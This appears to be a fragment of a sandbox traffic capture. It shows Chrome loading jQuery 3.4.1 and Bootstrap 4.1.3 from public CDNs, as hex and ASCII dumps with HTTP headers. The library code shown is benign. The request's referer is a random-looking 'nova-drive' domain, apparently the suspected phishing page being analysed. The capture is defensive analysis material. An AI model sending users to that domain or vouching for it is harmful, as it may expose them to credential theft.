                                                                                                                                                                X-Served-By: cache-lga21978-LGA, cache-nyc-kteb1890080-NYC
                                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                                X-Cache-Hits: 190, 0
                                                                                                                                                                X-Timer: S1732390561.176305,VS0,VE1
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 34 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 39 2d 30 35 2d 30 31 54 32 31
                                                                                                                                                                Data Ascii: /*! * jQuery JavaScript Library v3.4.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2019-05-01T21
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63
                                                                                                                                                                Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 72 6f 77 73 65 72 73 20 64 6f 6e 27 74 20 73 75 70 70 6f 72 74 20 74 68 65 20 22 6e 6f 6e 63 65 22 20 70 72 6f 70 65 72 74 79 20 6f 6e 20 73 63 72 69 70 74 73 2e 0a 09 09 09 09 2f 2f 20 4f 6e 20 74 68 65 20 6f 74 68 65 72 20 68 61 6e 64 2c 20 6a 75 73 74 20 75 73 69 6e 67 20 60 67 65 74 41 74 74 72 69 62 75 74 65 60 20 69 73 20 6e 6f 74 20 65 6e 6f 75 67 68 20 61 73 0a 09 09 09 09 2f 2f 20 74 68 65 20 60 6e 6f 6e 63 65 60 20 61 74 74 72 69 62 75 74 65 20 69 73 20 72 65 73 65 74 20 74 6f 20 61 6e 20 65 6d 70 74 79 20 73 74 72 69 6e 67 20 77 68 65 6e 65 76 65 72 20 69 74 0a 09 09 09 09 2f 2f 20 62 65 63 6f 6d 65 73 20 62 72 6f 77 73 69 6e 67 2d 63 6f 6e 74 65 78 74 20 63 6f 6e 6e 65 63 74 65 64 2e 0a 09 09 09 09 2f 2f 20 53 65 65 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                Data Ascii: rowsers don't support the "nonce" property on scripts.// On the other hand, just using `getAttribute` is not enough as// the `nonce` attribute is reset to an empty string whenever it// becomes browsing-context connected.// See https://
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 72 72 6f 72 20 74 6f 20 62 65 20 74 68 72 6f 77 6e 20 69 66 20 6e 6f 74 20 69 6e 63 6c 75 64 65 64 29 0a 09 09 72 65 74 75 72 6e 20 6e 65 77 20 6a 51 75 65 72 79 2e 66 6e 2e 69 6e 69 74 28 20 73 65 6c 65 63 74 6f 72 2c 20 63 6f 6e 74 65 78 74 20 29 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 34 2e 30 20 6f 6e 6c 79 0a 09 2f 2f 20 4d 61 6b 65 20 73 75 72 65 20 77 65 20 74 72 69 6d 20 42 4f 4d 20 61 6e 64 20 4e 42 53 50 0a 09 72 74 72 69 6d 20 3d 20 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 3b 0a 0a 6a 51 75 65 72 79 2e 66 6e 20 3d 20 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 0a 09 2f 2f 20 54 68 65 20 63 75 72 72 65 6e 74 20
                                                                                                                                                                Data Ascii: rror to be thrown if not included)return new jQuery.fn.init( selector, context );},// Support: Android <=4.0 only// Make sure we trim BOM and NBSPrtrim = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;jQuery.fn = jQuery.prototype = {// The current
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 69 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 65 6c 65 6d 2c 20 69 2c 20 65 6c 65 6d 20 29 3b 0a 09 09 7d 20 29 20 29 3b 0a 09 7d 2c 0a 0a 09 73 6c 69 63 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 20 73 6c 69 63 65 2e 61 70 70 6c 79 28 20 74 68 69 73 2c 20 61 72 67 75 6d 65 6e 74 73 20 29 20 29 3b 0a 09 7d 2c 0a 0a 09 66 69 72 73 74 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 20 30 20 29 3b 0a 09 7d 2c 0a 0a 09 6c 61 73 74 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 20 2d 31 20 29 3b 0a 09
                                                                                                                                                                Data Ascii: nction( elem, i ) {return callback.call( elem, i, elem );} ) );},slice: function() {return this.pushStack( slice.apply( this, arguments ) );},first: function() {return this.eq( 0 );},last: function() {return this.eq( -1 );
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 45 78 74 65 6e 64 20 74 68 65 20 62 61 73 65 20 6f 62 6a 65 63 74 0a 09 09 09 66 6f 72 20 28 20 6e 61 6d 65 20 69 6e 20 6f 70 74 69 6f 6e 73 20 29 20 7b 0a 09 09 09 09 63 6f 70 79 20 3d 20 6f 70 74 69 6f 6e 73 5b 20 6e 61 6d 65 20 5d 3b 0a 0a 09 09 09 09 2f 2f 20 50 72 65 76 65 6e 74 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 20 70 6f 6c 6c 75 74 69 6f 6e 0a 09 09 09 09 2f 2f 20 50 72 65 76 65 6e 74 20 6e 65 76 65 72 2d 65 6e 64 69 6e 67 20 6c 6f 6f 70 0a 09 09 09 09 69 66 20 28 20 6e 61 6d 65 20 3d 3d 3d 20 22 5f 5f 70 72 6f 74 6f 5f 5f 22 20 7c 7c 20 74 61 72 67 65 74 20 3d 3d 3d 20 63 6f 70 79 20 29 20 7b 0a 09 09 09 09 09 63 6f 6e 74 69 6e 75 65 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2f 20 52 65 63 75 72 73 65 20 69 66 20 77 65 27 72 65 20
                                                                                                                                                                Data Ascii: Extend the base objectfor ( name in options ) {copy = options[ name ];// Prevent Object.prototype pollution// Prevent never-ending loopif ( name === "__proto__" || target === copy ) {continue;}// Recurse if we're
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 65 72 79 2e 74 79 70 65 20 74 6f 20 63 61 74 63 68 20 68 6f 73 74 20 6f 62 6a 65 63 74 73 0a 09 09 69 66 20 28 20 21 6f 62 6a 20 7c 7c 20 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 20 6f 62 6a 20 29 20 21 3d 3d 20 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 7d 0a 0a 09 09 70 72 6f 74 6f 20 3d 20 67 65 74 50 72 6f 74 6f 28 20 6f 62 6a 20 29 3b 0a 0a 09 09 2f 2f 20 4f 62 6a 65 63 74 73 20 77 69 74 68 20 6e 6f 20 70 72 6f 74 6f 74 79 70 65 20 28 65 2e 67 2e 2c 20 60 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 20 6e 75 6c 6c 20 29 60 29 20 61 72 65 20 70 6c 61 69 6e 0a 09 09 69 66 20 28 20 21 70 72 6f 74 6f 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 09 09 7d 0a 0a
                                                                                                                                                                Data Ascii: ery.type to catch host objectsif ( !obj || toString.call( obj ) !== "[object Object]" ) {return false;}proto = getProto( obj );// Objects with no prototype (e.g., `Object.create( null )`) are plainif ( !proto ) {return true;}
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 20 28 20 61 72 72 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 4f 62 6a 65 63 74 28 20 61 72 72 20 29 20 29 20 29 20 7b 0a 09 09 09 09 6a 51 75 65 72 79 2e 6d 65 72 67 65 28 20 72 65 74 2c 0a 09 09 09 09 09 74 79 70 65 6f 66 20 61 72 72 20 3d 3d 3d 20 22 73 74 72 69 6e 67 22 20 3f 0a 09 09 09 09 09 5b 20 61 72 72 20 5d 20 3a 20 61 72 72 0a 09 09 09 09 29 3b 0a 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 70 75 73 68 2e 63 61 6c 6c 28 20 72 65 74 2c 20 61 72 72 20 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 72 65 74 75 72 6e 20 72 65 74 3b 0a 09 7d 2c 0a 0a 09 69 6e 41 72 72 61 79 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 61 72 72 2c 20 69 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 61
                                                                                                                                                                Data Ascii: ( arr != null ) {if ( isArrayLike( Object( arr ) ) ) {jQuery.merge( ret,typeof arr === "string" ?[ arr ] : arr);} else {push.call( ret, arr );}}return ret;},inArray: function( elem, arr, i ) {return a
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 69 66 20 28 20 76 61 6c 75 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 09 09 72 65 74 2e 70 75 73 68 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 65 76 65 72 79 20 6b 65 79 20 6f 6e 20 74 68 65 20 6f 62 6a 65 63 74 2c 0a 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 66 6f 72 20 28 20 69 20 69 6e 20 65 6c 65 6d 73 20 29 20 7b 0a 09 09 09 09 76 61 6c 75 65 20 3d 20 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 2c 20 61 72 67 20 29 3b 0a 0a 09 09 09 09 69 66 20 28 20 76 61 6c 75 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 09 09 72 65 74 2e 70 75 73 68 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 2f 2f 20 46 6c 61
                                                                                                                                                                Data Ascii: if ( value != null ) {ret.push( value );}}// Go through every key on the object,} else {for ( i in elems ) {value = callback( elems[ i ], i, arg );if ( value != null ) {ret.push( value );}}}// Fla
                                                                                                                                                                2024-11-23 19:36:01 UTC1378INData Raw: 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 73 2e 66 6f 75 6e 64 61 74 69 6f 6e 2f 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 39 2d 30 34 2d 30 38 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 20 77 69 6e 64 6f 77 20 29 20 7b 0a 0a 76 61 72 20 69 2c 0a 09 73 75 70 70 6f 72 74 2c 0a 09 45 78 70 72 2c 0a 09 67 65 74 54 65 78 74 2c 0a 09 69 73 58 4d 4c 2c 0a 09 74 6f 6b 65 6e 69 7a 65 2c 0a 09 63 6f 6d 70 69 6c 65 2c 0a 09 73 65 6c 65 63 74 2c 0a 09 6f 75 74 65 72 6d 6f
                                                                                                                                                                Data Ascii: zzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://js.foundation/ * * Date: 2019-04-08 */(function( window ) {var i,support,Expr,getText,isXML,tokenize,compile,select,outermo


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.449756104.18.10.2074434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:00 UTC576OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                Host: stackpath.bootstrapcdn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:01 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:01 GMT
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                CDN-PullZone: 252412
                                                                                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                CDN-RequestCountryCode: US
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cache-Control: public, max-age=31919000
                                                                                                                                                                ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                                                                CDN-ProxyVer: 1.04
                                                                                                                                                                CDN-RequestPullSuccess: True
                                                                                                                                                                CDN-RequestPullCode: 200
                                                                                                                                                                CDN-CachedAt: 10/04/2024 02:53:43
                                                                                                                                                                CDN-EdgeStorageId: 1029
                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                CDN-Status: 200
                                                                                                                                                                CDN-RequestTime: 0
                                                                                                                                                                CDN-RequestId: d7b67eb857a539907ed9a222fd865d4e
                                                                                                                                                                CDN-Cache: HIT
                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                Age: 1424616
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e739b0f6a6b7c82-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-11-23 19:36:01 UTC402INData Raw: 37 62 65 63 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                Data Ascii: 7bec/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66
                                                                                                                                                                Data Ascii: efine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.def
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 6e 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49
                                                                                                                                                                Data Ascii: n,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUI
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75
                                                                                                                                                                Data Ascii: handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retu
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 2c 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d
                                                                                                                                                                Data Ascii: ,_._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79
                                                                                                                                                                Data Ascii: (t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQuery
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69
                                                                                                                                                                Data Ascii: this._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibili
